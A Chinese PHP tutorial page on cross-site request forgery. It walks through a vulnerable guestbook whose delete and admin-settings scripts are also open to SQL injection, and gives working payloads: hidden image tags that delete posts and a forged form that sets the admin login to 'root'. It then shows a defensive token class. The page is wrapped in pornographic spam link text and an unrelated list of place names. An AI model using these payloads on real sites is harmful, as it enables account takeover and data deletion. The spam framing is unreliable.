最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

php漏洞之跨網(wǎng)站請求偽造與防止偽造方法

 更新時間:2013年08月15日 17:53:56   作者:  
今天我來給大家介紹在php中跨網(wǎng)站請求偽造的實現(xiàn)方法與最后我們些常用的防止偽造的具體操作方法,有需要了解的朋友可進入?yún)⒖?/div>
偽造跨站請求介紹
偽造跨站請求比較難以防范,而且危害巨大,攻擊者可以通過這種方式惡作劇,發(fā)spam信息,刪除數(shù)據(jù)等等。這種攻擊常見的表現(xiàn)形式有:
  偽造鏈接,引誘用戶點擊,或是讓用戶在不知情的情況下訪問
  偽造表單,引誘用戶提交。表單可以是隱藏的,用圖片或鏈接的形式偽裝。
  比較常見而且也很廉價的防范手段是在所有可能涉及用戶寫操作的表單中加入一個隨機且變換頻繁的字符串,然后在處理表單的時候對這個字符串進行檢查。這個隨機字符串如果和當前用戶身份相關聯(lián)的話,那么攻擊者偽造請求會比較麻煩。
如果攻擊者以隱藏的方式發(fā)送給目標用戶鏈接
<img src="/buy.php?item=watch&num=1000"/>,那么如果目標用戶不小心訪問以后,購買的數(shù)量就成了1000個
實例
隨緣網(wǎng)絡PHP留言板V1.0
復制代碼 代碼如下:

任意刪除留言
//delbook.php 此頁面用于刪除留言
<?php
include_once("dlyz.php");    //dlyz.php用戶驗證權限,當權限是admin的時候方可刪除留言
include_once("../conn.php");
$del=$_GET["del"];
$id=$_GET["id"];
if ($del=="data")
{
$ID_Dele= implode(",",$_POST['adid']);
$sql="delete from book where id in (".$ID_Dele.")";
mysql_query($sql);
}
else
{
$sql="delete from book where id=".$id; //傳遞要刪除的留言ID
mysql_query($sql);
}
mysql_close($conn);
echo "<script language='javascript'>";
echo "alert('刪除成功!');";
echo " location='book.php';";
echo "</script>";
?>

當我們具有admin權限,提交http://localhost/manage/delbook.php?id=2 時,就會刪除id為2的留言
利用方法:
我們使用普通用戶留言(源代碼方式),內容為
復制代碼 代碼如下:

<img src="delbook.php?id=2" />
<img src="delbook.php?id=3" />
<img src="delbook.php?id=4" />
<img src="delbook.php?id=5" />

插入4張圖片鏈接分別刪除4個id留言,然后我們返回首頁瀏覽看,沒有什么變化。。圖片顯示不了
現(xiàn)在我們再用管理員賬號登陸后,來刷新首頁,會發(fā)現(xiàn)留言就剩一條,其他在圖片鏈接中指定的ID號的留言,全部都被刪除。
攻擊者在留言中插入隱藏的圖片鏈接,此鏈接具有刪除留言的作用,而攻擊者自己訪問這些圖片鏈接的時候,是不具有權限的,所以看不到任何效果,但是當管理員登陸后,查看此留言,就會執(zhí)行隱藏的鏈接,而他的權限又是足夠大的,從而這些留言就被刪除了
修改管理員密碼
復制代碼 代碼如下:

//pass.php
if($_GET["act"])
{
$username=$_POST["username"];
$sh=$_POST["sh"];
$gg=$_POST["gg"];
$title=$_POST["title"];
$copyright=$_POST["copyright"]."<br/>網(wǎng)站:<a href=http://m.fzitv.net>腳本之家</a>";
$password=md5($_POST["password"]);
if(empty($_POST["password"]))
{
$sql="update gly set username='".$username."',sh=".$sh.",gg='".$gg."',title='".$title."',copyright='".$copyright."' where id=1";
}
else
{
$sql="update gly set username='".$username."',password='".$password."',sh=".$sh.",gg='".$gg."',title='".$title."',copyright='".$copyright."' where id=1";
}
mysql_query($sql);
mysql_close($conn);
echo "<script language='javascript'>";
echo "alert('修改成功!');";
echo " location='pass.php';";
echo "</script>";
}
這個文件用于修改管理密碼和網(wǎng)站設置的一些信息,我們可以直接構造如下表單:
<body>
<form action="http://localhost/manage/pass.php?act=xg" method="post" name="form1" id="form1">
<input type="radio" value="1"  name="sh">
<input type="radio" name="sh" checked value="0">
<input type="text" name="username" value="root">
<input type="password" name="password" value="root">
<input type="text"  name="title"  value="隨緣網(wǎng)絡PHP留言板V1.0(帶審核功能)" >
<textarea  name="gg"  rows="6" cols="80" >歡迎您安裝使用隨緣網(wǎng)絡PHP留言板V1.0(帶審核功能)!</textarea>
<textarea  name="copyright"  rows="6" cols="80" >隨緣網(wǎng)絡PHP留言本V1.0  版權所有:廈門隨緣網(wǎng)絡科技 2005-2009<br/>承接網(wǎng)站建設及系統(tǒng)定制 提供優(yōu)惠主機域名</textarea>
</form>
</body>

存為attack.html,放到自己網(wǎng)站上http://m.fzitv.net此頁面訪問后會自動向目標程序的pass.php提交參數(shù),用戶名修改為root,密碼修改為root,然后我們去留言板發(fā)一條留言,隱藏這個鏈接,管理訪問以后,他的用戶名和密碼全部修改成了root
防止偽造跨站請求
yahoo對付偽造跨站請求的辦法是在表單里加入一個叫.crumb的隨機串;而facebook也有類似的解決辦法,它的表單里常常會有post_form_id和fb_dtsg。
隨機串代碼實現(xiàn)
咱們按照這個思路,山寨一個crumb的實現(xiàn),代碼如下:
復制代碼 代碼如下:

<?php
class Crumb {
CONST SALT = "your-secret-salt";
static $ttl = 7200;
static public function challenge($data) {
return hash_hmac('md5', $data, self::SALT);
}
static public function issueCrumb($uid, $action = -1) {
$i = ceil(time() / self::$ttl);
return substr(self::challenge($i . $action . $uid), -12, 10);
}
static public function verifyCrumb($uid, $crumb, $action = -1) {
$i = ceil(time() / self::$ttl);
if(substr(self::challenge($i . $action . $uid), -12, 10) == $crumb ||
substr(self::challenge(($i - 1) . $action . $uid), -12, 10) == $crumb)
return true;
return false;
}
}

代碼中的$uid表示用戶唯一標識,而$ttl表示這個隨機串的有效時間。
  應用示例
  構造表單
  在表單中插入一個隱藏的隨機串crumb
復制代碼 代碼如下:

<form method="post" action="demo.php">
<input type="hidden" name="crumb" value="<?php echo Crumb::issueCrumb($uid)?>">
<input type="text" name="content">
<input type="submit">
</form>

處理表單 demo.php
  對crumb進行檢查
復制代碼 代碼如下:

<?php
if(Crumb::verifyCrumb($uid, $_POST['crumb'])) {
//按照正常流程處理表單
} else {
//crumb校驗失敗,錯誤提示流程
}
?>

相關文章

  • php實現(xiàn)的mongoDB單例模式操作類

    php實現(xiàn)的mongoDB單例模式操作類

    這篇文章主要介紹了php實現(xiàn)的mongoDB單例模式操作類,結合實例形式分析了php基于單例模式操作MongoDB數(shù)據(jù)庫的數(shù)據(jù)庫封裝類相關實現(xiàn)技巧,需要的朋友可以參考下
    2018-01-01
  • php文件上傳、下載和刪除示例

    php文件上傳、下載和刪除示例

    這篇文章主要為大家詳細介紹了php文件上傳、下載和刪除示例,文中示例代碼介紹的非常詳細,具有一定的參考價值,感興趣的小伙伴們可以參考一下
    2016-10-10
  • php 靜態(tài)化實現(xiàn)代碼

    php 靜態(tài)化實現(xiàn)代碼

    Replace函數(shù)用于將從模版文件中讀取的內容中的關鍵字替換成變量中的內容
    2009-03-03
  • php運行報錯Call to undefined function curl_init()的最新解決方法

    php運行報錯Call to undefined function curl_init()的最新解決方法

    其實在網(wǎng)上很早之前就出現(xiàn)過這個問題,網(wǎng)上百度了下,答案千篇一律,最近又遇到這個問題,但是百度出來的問題不能解決這個問題了,所以只能翻墻找答案,現(xiàn)在將解決的方法分享給大家,有需要的朋友們可以參考借鑒,下面來一起學習學習吧。
    2016-11-11
  • PHP進階學習之類的自動加載機制原理分析

    PHP進階學習之類的自動加載機制原理分析

    這篇文章主要介紹了PHP進階學習之類的自動加載機制,較為詳細的分析了php使用__autoload方法實現(xiàn)類的自動加載原理與相關使用注意事項,需要的朋友可以參考下
    2019-06-06
  • PHP讀取word文檔的方法分析【基于COM組件】

    PHP讀取word文檔的方法分析【基于COM組件】

    這篇文章主要介紹了PHP讀取word文檔的方法,較為詳細的分析了COM組件的開啟、屬性設置及基于COM組件打開并讀取word文檔的操作技巧,需要的朋友可以參考下
    2017-08-08
  • PHP運行出現(xiàn)Notice : Use of undefined constant 的完美解決方案分享

    PHP運行出現(xiàn)Notice : Use of undefined constant 的完美解決方案分享

    今天修改公司的網(wǎng)站,提示Notice : Use of undefined constant ,通過下面的方法解決了,最好是error_reporting(0);不需要更改配置
    2012-03-03
  • php7安裝openssl擴展方法

    php7安裝openssl擴展方法

    下面小編就為大家分享一篇php7安裝openssl擴展方法,具有很好的參考價值,希望對大家有所幫助。一起跟隨小編過來看看吧
    2018-03-03
  • 修改php.ini不生效問題解決方法(上傳大于8M的文件)

    修改php.ini不生效問題解決方法(上傳大于8M的文件)

    上傳大于8M的文件需要修改php的配置才可以生效,搜索好多的參考資料,結果修改還是沒有生效,經過一番折騰終于找到了解決方法,下面與大家分享了
    2013-06-06
  • PHP判斷手機是IOS還是Android

    PHP判斷手機是IOS還是Android

    這篇文章主要介紹了PHP判斷手機是IOS還是Android的三個示例,文中示例代碼介紹的非常詳細,具有一定的參考價值,感興趣的小伙伴們可以參考一下
    2015-12-12

最新評論

亚东县| 巴里| 丹阳市| 巢湖市| 衡阳县| 九江市| 临武县| 汝城县| 桦川县| 永顺县| 禹州市| 南昌市| 太仓市| 岳普湖县| 富裕县| 武清区| 海阳市| 图木舒克市| 高平市| 宾川县| 美姑县| 昌江| 彝良县| 九江县| 济南市| 达州市| 文安县| 徐州市| 遂平县| 华安县| 台州市| 峨眉山市| 河东区| 兴安盟| 尖扎县| 巴林左旗| 新宁县| 仙居县| 台南县| 聊城市| 金湖县|